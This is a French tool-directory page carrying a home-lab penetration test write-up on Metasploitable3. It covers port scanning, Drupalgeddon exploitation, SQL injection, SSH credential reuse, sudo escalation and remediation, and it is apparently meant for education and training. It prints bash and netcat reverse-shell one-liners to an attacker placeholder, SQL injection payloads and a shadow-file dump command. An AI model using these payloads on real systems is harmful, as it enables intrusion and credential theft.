Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
metasploitable3-pentest-writeup — Rapport de test d'intrusion en laboratoire domestique sur Metasploitable3 couvrant la reconnaissance Nmap, l'RCE Drupalgeddon, l'injection SQL, la réutilisation d'identifiants SSH, l'escalade de privilèges sudo et les reverse shells. | Kitploit
Outils/GitHubGitHub/adfortunato/metasploitable3-pentest-writeup
Escalade de PrivilègesReconnaissanceAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationCTFTests d'Intrusion

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Apprentissage et Éducation
Labs et Pratique
GitHubadfortunato/metasploitable3-pentest-writeup

metasploitable3-pentest-writeup

Rapport de test d'intrusion en laboratoire domestique sur Metasploitable3 couvrant la reconnaissance Nmap, l'RCE Drupalgeddon, l'injection SQL, la réutilisation d'identifiants SSH, l'escalade de privilèges sudo et les reverse shells.

Voir le dépôt
1il y a 19h 15mPas encore vérifié

Metasploitable3 — Rapport de test d'intrusion

Auteur : Arlen Fortunato
Date : Septembre 2026
Environnement : Parrot OS (attaquant) → Metasploitable3 Ubuntu 14.04 (cible)
Périmètre : Test d'intrusion réseau complet — énumération, exploitation, élévation de privilèges, post-exploitation
Type : Home Lab / Entraînement Capture The Flag

⚠️ Tous les identifiants ci-dessous sont masqués. Il s'agissait d'un exercice légal en home lab isolé.


Outils utilisés

OutilRôle
NmapScan de ports, détection de services/versions, empreinte OS
Metasploit (msfconsole)Exploitation (CVE-2014-3704), gestion de sessions
msfvenomGénération de payloads (reverse shells bash/netcat)
nc (netcat)Écoute de reverse shell
curl / sedCréation manuelle de SQLi + formatage de sortie HTML
ssh / scpAccès distant, validation d'identifiants
openssl s_clientVérification de service TLS/SSL
gobusterBrute-force de répertoires (énumération web)

Reconnaissance — Scan complet des ports avec Nmap

root@kitploit:~
nmap -O -sV -p- -oA metasploitable3 <TARGET_IP>

OS : Linux Ubuntu 14.04, Kernel 3.13.0-24-generic x86_64


Synthèse des vulnérabilités


Détails des vulnérabilités

1. UnrealIRCd 3.2.8.1 (CVE-2010-2075) — Faux positif

Vulnérabilité : UnrealIRCd 3.2.8.1 a historiquement été distribué avec un binaire trojanisé qui exécute des commandes arbitraires lorsqu'un client non authentifié envoie une chaîne de déclenchement avant l'enregistrement — RCE en tant qu'utilisateur du démon IRC.

Tentative d'exploitation : Module Metasploit exploit/unix/irc/unreal_ircd_3281_backdoor avec les payloads cmd/unix/reverse_perl, cmd/unix/reverse_netcat, cmd/unix/reverse_bash. La vérification automatique du module a signalé le service comme vulnérable ; aucune session retournée avec aucun payload.

Dépannage effectué :

  • Port accessible (nc -vz)
  • Port confirmé comme IRC en clair, pas TLS (openssl s_client)
  • Connexion inverse manuelle depuis la cible confirmant que le réseau sortant fonctionne
  • Déclenchement manuel de la backdoor via nc retournant l'erreur de protocole IRC 451 — commande interprétée comme commande IRC, jamais exécutée

Conclusion : La bannière de version indique le build vulnérable, mais la backdoor est absente dans cette instance (binaire propre/recompilé). Classé non exploitable — faux positif, avec preuves.


2. Drupal 7.5 — Drupageddon (CVE-2014-3704)

Vulnérabilité : Drupal 7.x avant 7.32 contient une injection SQL critique dans la couche d'abstraction de base de données permettant l'exécution de code à distance non authentifiée.

Confirmation de version : CHANGELOG.txt → "Drupal 7.5, 2011-07-27"

Exploitation :

root@kitploit:~
msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS <TARGET_IP>
set TARGETURI /drupal/
set LHOST <ATTACKER_IP>
set payload php/meterpreter_reverse_tcp
run

Résultat :

root@kitploit:~
getuid  → www-data
sysinfo → Linux ubuntu 3.13.0-24-generic x86_64
pwd     → /var/www/html/drupal

Énumération post-exploitation :

  • /var/www/html : chat/, drupal/, payroll_app.php, phpmyadmin/
  • /home : 16 comptes utilisateurs

3. Application de paie — Injection SQL basée sur UNION (manuelle)

Vulnérabilité : Formulaire de connexion payroll_app.php, injection SQL dans le champ mot de passe. Aucune automatisation utilisée — créée via curl.

Étape 1 — Contournement d'authentification :

root@kitploit:~
' or 1=1#

' ferme la chaîne SQL, or 1=1 force la condition à vrai, # commente le guillemet restant.

Étape 2 — Nombre de colonnes + mappage d'affichage :

root@kitploit:~
' UNION SELECT null, null, null, null#     -- no error = 4 columns
' UNION SELECT 1, 2, 3, 4#                 -- markers: 1=Username, 2=First, 3=Last, 4=Salary

Étape 3 — Énumération d'information_schema :

QuestionRéponse
Version BDD / utilisateurMySQL 5.5.62, root@localhost

Étape 4 — Dump (mots de passe masqués) :

root@kitploit:~
' UNION SELECT username, password, salary, null FROM users#

4. SSH — Identifiants par défaut et réutilisation d'identifiants

Chemin 1 — Compte par défaut : paire d'identifiants vagrant par défaut authentifiée via SSH → utilisateur dans le groupe sudo avec (ALL : ALL) NOPASSWD: ALL.

Chemin 2 — Réutilisation d'identifiants : identifiants récupérés depuis le dump SQLi authentifiés directement via SSH en tant qu'autre utilisateur du lab (luke_skywalker, groupe sudo, (ALL : ALL) ALL).

Signification : démontre la réutilisation d'identifiants entre services — identifiants applicatifs mappés à un compte système.


5. Élévation de privilèges (deux chemins)

  • Chemin A : vagrant → sudo -l affiche NOPASSWD: ALL → sudo su - → uid=0(root).
  • Chemin B : luke_skywalker → sudo (ALL : ALL) ALL → sudo su - → uid=0(root).

Aucun exploit local nécessaire — les deux comptes disposent de droits sudo excessivement permissifs.


6. Dump du shadow

root@kitploit:~
sudo cat /etc/shadow

16 hashes md5crypt ($1$) extraits — collecte complète d'identifiants après élévation de privilèges.


7. Post-exploitation — Reverse shells

Payload 1 — bash :

root@kitploit:~
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

Capturé sur nc -lnvp 4444 → shell interactif.

Payload 2 — netcat (named-pipe) :

root@kitploit:~
mkfifo /tmp/fifo; nc <ATTACKER_IP> 4445 0</tmp/fifo | /bin/sh >/tmp/fifo 2>&1; rm /tmp/fifo

Capturé sur nc -lnvp 4445 → shell interactif.

Mécanisme : le named pipe (FIFO) fait le pont entre stdin/stdout de netcat et /bin/sh, formant un tunnel bidirectionnel sur un seul socket ; le FIFO est nettoyé ensuite.


Recommandations de remédiation


Avertissement

Tous les tests ont été effectués exclusivement dans un home lab isolé utilisant des logiciels intentionnellement vulnérables (Rapid7 Metasploitable3). Aucun système de production ni cible non autorisée n'a été sollicité. Ce rapport est destiné à des fins éducatives et au développement personnel de compétences uniquement.

Télécharger l’outil
PortÉtatServiceVersion
21/tcpopenFTPProFTPD 1.3.5
22/tcpopenSSHOpenSSH 6.6.1p1
80/tcpopenHTTPApache httpd 2.4.7 (Ubuntu)
445/tcpopenSMBSamba smbd 3.X–4.X
631/tcpopenIPPCUPS 1.7
3306/tcpopenMySQLMySQL (unauthorized)
3500/tcpopenHTTPWEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcpopenIRCUnrealIRCd
8080/tcpopenHTTPJetty 8.1.7.v20120910
#VulnérabilitéCVE / TypePortSévéritéRésultat
1Empreinte de version UnrealIRCd — sonde de backdoorCVE-2010-20756697⚠️ Faux positifVérification automatique du module réussie, sonde manuelle échouée — backdoor absente du build
2Drupal 7.5 — Drupageddon RCECVE-2014-370480🔴 CritiqueShell Meterpreter en tant que www-data
3Application de paie — SQLi UNION (manuelle)Injection manuelle80🔴 CritiqueDump complet de la BDD (15 utilisateurs, mots de passe en clair — masqués)
4SSH — identifiants par défaut + réutilisésPar défaut / réutilisation d'identifiants22🔴 Critiquevagrant (NOPASSWD sudo), luke_skywalker (sudo ALL)
5Élévation de privilèges (deux chemins)Sudo mal configuréN/A🔴 Critiqueroot via les deux comptes
6Dump du shadowPost-exploitationN/A🔴 Critique16 hashes md5crypt extraits
7Reverse shells (bash + netcat)msfvenom / création manuelle4444/4445🟠 ÉlevéeShells interactifs capturés sur l'écouteur de l'attaquant
Bases de donnéesinformation_schema, drupal, mysql, payroll, performance_schema
Tables dans payrollusers
Colonnes dans usersusername, first_name, last_name, password, salary
Nom d'utilisateurMot de passeSalaire
leia_organa[REDACTED]9560
luke_skywalker[REDACTED]1080
han_solo[REDACTED]1200
artoo_detoo[REDACTED]22222
boba_fett[REDACTED]20000
greedo[REDACTED]50000
(+ 9 autres comptes)[REDACTED]—
VulnérabilitéRecommandation
Empreinte de version UnrealIRCdVérifier l'intégrité de la source du binaire (checksums) ; mettre à jour ou supprimer
Drupal 7.5Mettre à jour vers la dernière version stable ; appliquer SA-CORE-2014-005
SQLi application de paieRequêtes paramétrées / requêtes préparées ; valider les entrées
Identifiants SSH par défautRenouveler/supprimer les comptes par défaut ; imposer l'authentification par clé
Sudo excessifAppliquer le moindre privilège ; supprimer les autorisations NOPASSWD globales
Réutilisation d'identifiantsImposer des mots de passe uniques par service ; politique de mots de passe
Hachage de mots de passe faibleMigrer md5crypt → bcrypt / Argon2id